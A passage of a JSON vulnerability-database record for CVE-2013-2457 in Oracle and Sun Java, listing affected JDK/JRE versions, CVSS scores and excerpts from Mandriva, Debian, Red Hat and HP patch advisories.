"cpe:2.3:a:oracle:jdk:1.6.0:update35:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update26:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update39:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update22:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update31:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update18:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update27:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update13:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update24:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update12:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update26:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update19:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update10:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update9:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update28:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update21:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update20:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update11:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update25:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update16:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update15:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update8:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update7:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update33:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update23:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update14:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update6:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update29:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:*:update45:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.5.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.5.0:update38:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.5.0:update36:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update17:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.5.0:update40:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.5.0:update39:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.5.0:update41:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update20:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update15:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update18:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update27:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update21:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update31:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update11:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update26:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update16:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update25:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update17:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update28:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update11_b03:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update9:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update29:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update22:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update12:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update7:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update6:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update33:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update24:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update23:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update14:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update7_b03:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.5.0:update38:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update10:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update19:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:*:update45:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.5.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update13:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.5.0:update40:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.5.0:update39:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.5.0:update41:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.5.0:update36:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update8:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2013-2457" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Red Hat", "sources": [ { "db": "PACKETSTORM", "id": "122085" }, { "db": "PACKETSTORM", "id": "126195" }, { "db": "PACKETSTORM", "id": "123735" }, { "db": "PACKETSTORM", "id": "122273" }, { "db": "PACKETSTORM", "id": "122084" } ], "trust": 0.5 }, "cve": "CVE-2013-2457", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "impactScore": 2.9, "integrityImpact": "PARTIAL", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "None", "baseScore": 5.0, "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2013-2457", "impactScore": null, "integrityImpact": "Partial", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2013-2457", "trust": 1.8, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2013-2457", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2013-2457" }, { "db": "JVNDB", "id": "JVNDB-2013-003054" }, { "db": "NVD", "id": "CVE-2013-2457" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 21 and earlier, 6 Update 45 and earlier, and 5.0 Update 45 and earlier, and OpenJDK 7, allows remote attackers to affect integrity via vectors related to JMX. NOTE: the previous information is from the June 2013 CPU. Oracle has not commented on claims from another vendor that this issue is due to an incorrect implementation of \"certain class checks\" that allows remote attackers to bypass intended class restrictions. \nThe vulnerability can be exploited over multiple protocols. This issue affects the \u0027CORBA\u0027 sub-component. \nThis vulnerability affects the following supported versions:\n7 Update 21 , 6 Update 45 , 5.0 Update 45. \n \n This updates IcedTea6 to version 1.11.12, which fixes these issues,\n as well as several other bugs. \n \n Additionally, this OpenJDK update causes icedtea-web, the Java browser\n plugin, to crash, so icedtea-web has been patched to fix this. The verification\n of md5 checksums and GPG signatures is performed automatically for you. \n\n All packages are signed by Mandriva for security. You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n http://www.mandriva.com/en/support/security/advisories/\n\n If you want to report vulnerabilities, please contact\n\n security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID Date User ID\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\n \u003csecurity*mandriva.com\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.12 (GNU/Linux)\n\niD8DBQFR47+cmqjQ0CJFipgRAmnTAJ4lalit4V4VWsSE6KHeem9qtHb+9gCgmJ/U\nGUelRnMi6Rq7d9NhnTCwrlg=\n=rErU\n-----END PGP SIGNATURE-----\n. \n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 7u25-2.3.10-1~deb7u1. In addition icedtea-web needed to be\nupdated to 1.4-3~deb7u1. \n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 7u25-2.3.10-1. Further\ninformation about these flaws can be found on the Oracle Java SE Critical\nPatch Update Advisory pages, listed in the References section. should be restricted package (CORBA, 8025022)\n1053495 - CVE-2014-0410 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)\n1053496 - CVE-2014-0415 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)\n1053499 - CVE-2013-5889 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)\n1053501 - CVE-2014-0417 Oracle JDK: unspecified vulnerability fixed in 5.0u71, 6u71 and 7u51 (2D)\n1053502 - CVE-2014-0387 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)\n1053504 - CVE-2014-0424 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)\n1053507 - CVE-2014-0403 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)\n1053508 - CVE-2014-0375 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)\n1053509 - CVE-2013-5905 Oracle JDK: unspecified vulnerability fixed in 5.0u71, 6u71 and 7u51 (Install)\n1053510 - CVE-2013-5906 Oracle JDK: unspecified vulnerability fixed in 5.0u71, 6u71 and 7u51 (Install)\n1053512 - CVE-2013-5902 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)\n1053513 - CVE-2014-0418 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)\n1053515 - CVE-2013-5887 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)\n1053516 - CVE-2013-5899 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)\n1053517 - CVE-2013-5888 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)\n1053518 - CVE-2013-5898 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)\n1060907 - CVE-2014-1876 OpenJDK: insecure temporary file use in unpack200 (Libraries, 8033618)\n1086632 - CVE-2014-2398 OpenJDK: insufficient escaping of window title string (Javadoc, 8026736)\n1086645 - CVE-2014-0453 OpenJDK: RSA unpadding timing issues (Security, 8027766)\n1087409 - CVE-2014-0429 OpenJDK: Incorrect mlib/raster image validation (2D, 8027841)\n1087411 - CVE-2014-0457 OpenJDK: ServiceLoader Exception handling security bypass (Libraries, 8031394)\n1087413 - CVE-2014-0456 OpenJDK: System.arraycopy() element race condition (Hotspot, 8029858)\n1087417 - CVE-2014-2421 OpenJDK: JPEG decoder input stream handling (2D, 8029854)\n1087426 - CVE-2014-0461 OpenJDK: Better ScriptEngineManager ScriptEngine management (Libraries, 8036794)\n1087427 - CVE-2014-2412 OpenJDK: AWT thread context handling (AWT, 8025010)\n1087428 - CVE-2014-0451 OpenJDK: AWT incorrect FlavorMap seperation (AWT, 8026797)\n1087430 - CVE-2014-0458 OpenJDK: Activation framework default command map caching (JAX-WS, 8025152)\n1087431 - CVE-2014-2414 OpenJDK: incorrect caching of data initialized via TCCL (JAXB, 8025030)\n1087434 - CVE-2014-2423 OpenJDK: incorrect caching of data initialized via TCCL (JAXWS, 8026188)\n1087436 - CVE-2014-0452 OpenJDK: incorrect caching of data initialized via TCCL (JAXWS, 8026801)\n1087439 - CVE-2014-0446 OpenJDK: Protect logger handlers (Libraries, 8029740)\n1087441 - CVE-2014-2427 OpenJDK: remove insecure Java Sound provider caching (Sound, 8026163)\n1087442 - CVE-2014-0460 OpenJDK: missing randomization of JNDI DNS client query IDs (JNDI, 8030731)\n1087443 - CVE-2014-2403 OpenJDK: JAXP CharInfo file access restriction (JAXP, 8029282)\n1088025 - CVE-2014-2428 Oracle JDK: unspecified vulnerability fixed in 6u75, 7u55 and 8u5 (Deployment)\n1088027 - CVE-2014-2409 Oracle JDK: unspecified vulnerability fixed in 6u75, 7u55 and 8u5 (Deployment)\n1088028 - CVE-2014-0449 Oracle JDK: unspecified vulnerability fixed in 6u75, 7u55 and 8u5 (Deployment)\n1088030 - CVE-2014-2401 Oracle JDK: unspecified vulnerability fixed in 5.0u75, 6u75, 7u55 and 8u5 (2D)\n1088031 - CVE-2014-2420 Oracle JDK: unspecified vulnerability fixed in 6u75, 7u55 and 8u5 (Deployment)\n\n6. In a typical operating environment, these are of low security risk as\nthe runtime is not used on untrusted applets. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\ndocDisplay?docId=emr_na-c03874547\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c03874547\nVersion: 1\n\nHPSBUX02908 rev.1 - HP-UX Running Java6, Remote Unauthorized Access,\nDisclosure of Information, and Other Vulnerabilities\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2013-07-31\nLast Updated: 2013-07-31\n\nPotential Security Impact: Remote unauthorized access, disclosure of\ninformation, and other vulnerabilities\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities have been identified in the Java Runtime\nEnvironment (JRE) and the Java Developer Kit (JDK) running on HP-UX. \n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHP-UX B.11.11, B.11.23, and B.11.31 running HP JDK and JRE v6.0.19 and\nearlier. \n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2013-1500 (AV:L/AC:L/Au:N/C:P/I:P/A:N) 3.6\nCVE-2013-1571 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3\nCVE-2013-2407 (AV:N/AC:L/Au:N/C:P/I:N/A:P) 6.4\nCVE-2013-2412 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2013-2433 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3\nCVE-2013-2437 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2013-2442 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2013-2444 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2013-2445 (AV:N/AC:L/Au:N/C:N/I:N/A:C) 7.8\nCVE-2013-2446 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2013-2447 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2013-2448 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6\nCVE-2013-2450 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2013-2451 (AV:L/AC:H/Au:N/C:P/I:P/A:P) 3.7\nCVE-2013-2452 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2013-2453 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2013-2454 (AV:N/AC:M/Au:N/C:P/I:P/A:N) 5.8\nCVE-2013-2455 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2013-2456 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2013-2457 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2013-2459 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2013-2461 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2013-2463 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2013-2464 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2013-2465 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2013-2466 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2013-2468 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2013-2469 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2013-2470 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2013-2471 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2013-2472 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2013-2473 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2013-3743 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has provided the following Java version upgrade to resolve these\nvulnerabilities. \n\nThe upgrade is available from the following location\n\nhttp://www.hp.com/java\n\nOS Version\n Release Version\n\nHP-UX B.11.11, B.11.23, B.11.31\n JDK and JRE v6.0.20 or subsequent\n\nMANUAL ACTIONS: Yes - Update\nFor Java v6.0 update to Java v6.0.20 or subsequent\nPRODUCT SPECIFIC INFORMATION\n\nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application\nthat replaces HP-UX Security Patch Check. It analyzes all Security Bulletins\nissued by HP and lists recommended actions that may apply to a specific HP-UX\nsystem. It can also download patches and create a depot automatically. For\nmore information see https://www.hp.com/go/swa\n\nThe following text is for use by the HP-UX Software Assistant. \n\nAFFECTED VERSIONS\n\nHP-UX B.11.11\nHP-UX B.11.23\n===========\nJdk60.JDK60-COM\nJdk60.JDK60-PA20\nJdk60.JDK60-PA20W\nJre60.JRE60-COM\nJre60.JRE60-COM-DOC\nJre60.JRE60-PA20\nJre60.JRE60-PA20-HS\nJre60.JRE60-PA20W\nJre60.JRE60-PA20W-HS\nJdk60.JDK60-IPF32\nJdk60.JDK60-IPF64\nJre60.JRE60-COM\nJre60.JRE60-IPF32\nJre60.JRE60-IPF32-HS\nJre60.JRE60-IPF64\nJre60.JRE60-IPF64-HS\naction: install revision 1.6.0.20.00 or subsequent\n\nHP-UX B.11.23\nHP-UX B.11.31\n===========\nJdk60.JDK60-COM\nJdk60.JDK60-IPF32\nJdk60.JDK60-IPF64\nJre60.JRE60-IPF32\nJre60.JRE60-IPF32-HS\nJre60.JRE60-IPF64\nJre60.JRE60-IPF64-HS\nJre60.JRE60-COM\nJre60.JRE60-IPF32\nJre60.JRE60-IPF32-HS\nJre60.JRE60-IPF64\nJre60.JRE60-IPF64-HS\naction: install revision 1.6.0.20.00 or subsequent\n\nEND AFFECTED VERSIONS\n\nHISTORY\nVersion:1 (rev.1) - 31 July 2013 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2013 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits;damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Critical: java-1.7.0-openjdk security update\nAdvisory ID: RHSA-2013:0957-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2013-0957.html\nIssue date: 2013-06-19\nCVE Names: CVE-2013-1500 CVE-2013-1571 CVE-2013-2407 \n CVE-2013-2412 CVE-2013-2443 CVE-2013-2444 \n CVE-2013-2445 CVE-2013-2446 CVE-2013-2447 \n CVE-2013-2448 CVE-2013-2449 CVE-2013-2450 \n CVE-2013-2452 CVE-2013-2453 CVE-2013-2454 \n CVE-2013-2455 CVE-2013-2456 CVE-2013-2457 \n CVE-2013-2458 CVE-2013-2459 CVE-2013-2460 \n CVE-2013-2461 CVE-2013-2463 CVE-2013-2465 \n CVE-2013-2469 CVE-2013-2470 CVE-2013-2471 \n CVE-2013-2472 CVE-2013-2473 \n=====================================================================\n\n1. Summary:\n\nUpdated java-1.7.0-openjdk packages that fix various security issues are\nnow available for Red Hat Enterprise Linux 6. \n\nThe Red Hat Security Response Team has rated this update as having critical\nsecurity impact. Common Vulnerability Scoring System (CVSS) base scores,\nwhich give detailed severity ratings, are available for each vulnerability\nfrom the CVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Desktop (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, noarch, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - noarch, x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, noarch, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, noarch, x86_64\n\n3. 